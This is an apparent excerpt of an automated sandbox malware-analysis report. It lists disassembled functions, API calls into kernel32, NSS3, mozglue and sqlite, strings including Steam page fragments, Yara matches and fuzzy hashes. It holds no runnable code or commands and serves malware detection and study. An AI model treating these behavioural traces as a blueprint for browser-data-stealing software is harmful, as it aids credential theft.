                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __allrem
                                                                                                                                                                                          • String ID: @dl$Pdl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$dl
                                                                                                                                                                                          • API String ID: 2933888876-3021566760
                                                                                                                                                                                          • Opcode ID: 2d1f99e930fa5ccdd6d69e89c4dc0769d363ab354e32398895b46f1442c62c66
                                                                                                                                                                                          • Instruction ID: 798289d179f8f69a5e1664636a94aaae7c03f2becf0fd37f2bb18413a34fe234
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d1f99e930fa5ccdd6d69e89c4dc0769d363ab354e32398895b46f1442c62c66
                                                                                                                                                                                          • Instruction Fuzzy Hash: A561D179B00205AFDB04CF69CC94A6A77F1FF4A324F108528E915AB7D0DB35AD06CBA5
                                                                                                                                                                                          Function 0003B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,0A0524C0), ref: 0003B9C5
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0003BA3E
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0003BA5A
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0003BA6E
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0003BA77
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0003BA87
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0003BAA5
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0003BAB5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2979504256-3916222277
                                                                                                                                                                                          • Opcode ID: 93d723f3a5537babba022680ccc554eed81bb30ab026aa1955077557a87b89a5
                                                                                                                                                                                          • Instruction ID: cdb803ec26d911c427b07d32be8686d86f81c474202c41dcd1c95103aa13ef83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 93d723f3a5537babba022680ccc554eed81bb30ab026aa1955077557a87b89a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5511571D0061CAFEB6ADF99DC81AAEBBF9EB04308F10442AE615E7260D7749D45CF11
                                                                                                                                                                                          Function 0002DB7F Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109stringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0002DBBB
                                                                                                                                                                                          • strchr.MSVCRT ref: 0002DBCD
                                                                                                                                                                                          • strchr.MSVCRT ref: 0002DBF2
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC14
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002DC21
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC28
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DC6F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                          • String ID: 0123456789ABCDEF$`Tu
                                                                                                                                                                                          • API String ID: 453150750-1497512213
                                                                                                                                                                                          • Opcode ID: 5872d20016ff4620bb9217baec96f28f9f576daa5e82d3ba0f1e71060a9fcad5
                                                                                                                                                                                          • Instruction ID: bf80b82487361b3c4c1f3af7cd3d09ddd84d9a9d3c074aa742f20536053a2c86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5872d20016ff4620bb9217baec96f28f9f576daa5e82d3ba0f1e71060a9fcad5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 28314F719002299FDB00DFE8EC49AEEBBB9AF08355F110169E905FB285DB75AD05CB90
                                                                                                                                                                                          Function 6C536DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6C537D8F,6C537D8F,?,?), ref: 6C536DC8
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C58FE08
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C58FE1D
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C58FE62
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C537D8F,?,?), ref: 6C536DD5
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C658FA0,00000000,?,?,?,?,6C537D8F,?,?), ref: 6C536DF7
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C536E35
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C58FE29
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C58FE3D
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C58FE6F
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C536E4C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59116E
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C658FE0,00000000), ref: 6C536E82
                                                                                                                                                                                            • Part of subcall function 6C536AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C53B21D,00000000,00000000,6C53B219,?,6C536BFB,00000000,?,00000000,00000000,?,?,?,6C53B21D), ref: 6C536B01
                                                                                                                                                                                            • Part of subcall function 6C536AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C536B8A
                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C536F1E
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C536F35
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C658FE0,00000000), ref: 6C536F6B
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6C537D8F,?,?), ref: 6C536FE1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 587344769-0
                                                                                                                                                                                          • Opcode ID: eb323a7780fed80267f9f966572cf7b17946c9c8d6293ed4093bb4240d76a1d8
                                                                                                                                                                                          • Instruction ID: 198dd6e2729ac02e514b1ec946fa53f58a79a9a473747a474b1850d5ba6ed3ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb323a7780fed80267f9f966572cf7b17946c9c8d6293ed4093bb4240d76a1d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3718071D113669BDB00CF55CD40BAABBA8FF98348F155229E808DBB11FB71E994CB90
                                                                                                                                                                                          Function 6C57ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE10
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE24
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,6C55D079,00000000,00000001), ref: 6C57AE5A
                                                                                                                                                                                          • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE6F
                                                                                                                                                                                          • free.MOZGLUE(85145F8B,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE7F
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEB1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEC9
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEF1
                                                                                                                                                                                          • free.MOZGLUE(6C55CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C55CDBB,?), ref: 6C57AF0B
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AF30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161582014-0
                                                                                                                                                                                          • Opcode ID: ffbbaf16dd576a048f53effcd9c08ff21df9ccc85293d80a08481d1b441b1e27
                                                                                                                                                                                          • Instruction ID: aae19c95b468e1249149ed34047998e1158cc5cd5af234712e1767492fbb429c
                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbbaf16dd576a048f53effcd9c08ff21df9ccc85293d80a08481d1b441b1e27
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE518DB5A01602EFDB10DF29DC84B5AB7B4BF05318F145664EC1997E11E731E8A4CBE1
                                                                                                                                                                                          Function 6C554CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C55AB7F,?,00000000,?), ref: 6C554CB4
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C55AB7F,?,00000000,?), ref: 6C554CC8
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C55AB7F,?,00000000,?), ref: 6C554CE0
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C55AB7F,?,00000000,?), ref: 6C554CF4
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?,?,6C55AB7F,?,00000000,?), ref: 6C554D03
                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,?), ref: 6C554D10
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          • PR_Now.NSS3(?,00000000,?), ref: 6C554D26
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DC6
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DD1
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5F9DED
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C554D98
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C554DDA
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C554E02
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4032354334-0
                                                                                                                                                                                          • Opcode ID: 49f37a4ecbe81c44df1220e7bf6038275ba0759b4577a2c5cd9508e74db1e9dc
                                                                                                                                                                                          • Instruction ID: 8b4d6772596f2939cb58622861a06e9ba179ec84d4bf2a08095bd1c662322373
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49f37a4ecbe81c44df1220e7bf6038275ba0759b4577a2c5cd9508e74db1e9dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8341C8B5A00201EBDB01AF29EC8595677B8AF45318F458571EC1987B11FB31ED34C7E2
                                                                                                                                                                                          Function 6C44CC60 Relevance: 15.1, APIs: 7, Strings: 3, Instructions: 104memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C4131A7), ref: 6C44CDDD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C44CC6F
                                                                                                                                                                                          • : (malloc) Error in VirtualFree(), xrefs: 6C44CFA4, 6C44CFB8
                                                                                                                                                                                          • <jemalloc>, xrefs: 6C44CF9F, 6C44CFB3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity
                                                                                                                                                                                          • API String ID: 4275171209-2593390296
                                                                                                                                                                                          • Opcode ID: 85e6adb04ef1e27d904ef09ab45ce1bfd3d038967400507e4f27799be02488f4
                                                                                                                                                                                          • Instruction ID: d4537f742aa6bcf2e9c3c67d8b87930e78f53f3b80a481e031a5b09706b07956
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85e6adb04ef1e27d904ef09ab45ce1bfd3d038967400507e4f27799be02488f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D319071B402259BFB10FEA58C45F6E7B75EB41B59F388018E611ABBC0DB70D4098BA1
                                                                                                                                                                                          Function 6C532E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C532CDA,?,00000000), ref: 6C532E1E
                                                                                                                                                                                            • Part of subcall function 6C58FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C539003,?), ref: 6C58FD91
                                                                                                                                                                                            • Part of subcall function 6C58FD80: PORT_Alloc_Util.NSS3(A4686C59,?), ref: 6C58FDA2
                                                                                                                                                                                            • Part of subcall function 6C58FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C59,?,?), ref: 6C58FDC4
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C532E33
                                                                                                                                                                                            • Part of subcall function 6C58FD80: free.MOZGLUE(00000000,?,?), ref: 6C58FDD1
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C532E4E
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C532E5E
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C532E71
                                                                                                                                                                                          • PL_HashTableRemove.NSS3(?), ref: 6C532E84
                                                                                                                                                                                          • PL_HashTableAdd.NSS3(?,00000000), ref: 6C532E96
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C532EA9
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C532EB6
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C532EC5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3332421221-0
                                                                                                                                                                                          • Opcode ID: b15f79ff181b3c5b95bb5c31bae55c4fdd5930282105bfe5e10074d4f40a88ed
                                                                                                                                                                                          • Instruction ID: 3a2a39bcbedda7460fe0d57a5c63e63257be81b4aa12ce1cd871599b49721efc
                                                                                                                                                                                          • Opcode Fuzzy Hash: b15f79ff181b3c5b95bb5c31bae55c4fdd5930282105bfe5e10074d4f40a88ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1221F872A00111A7EF015F26EC4AAEB3B79DB9221DF040530ED1C82752FB32D958E6E5
                                                                                                                                                                                          Function 6C4BCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4BB999), ref: 6C4BCFF3
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4BB999), ref: 6C4BD02B
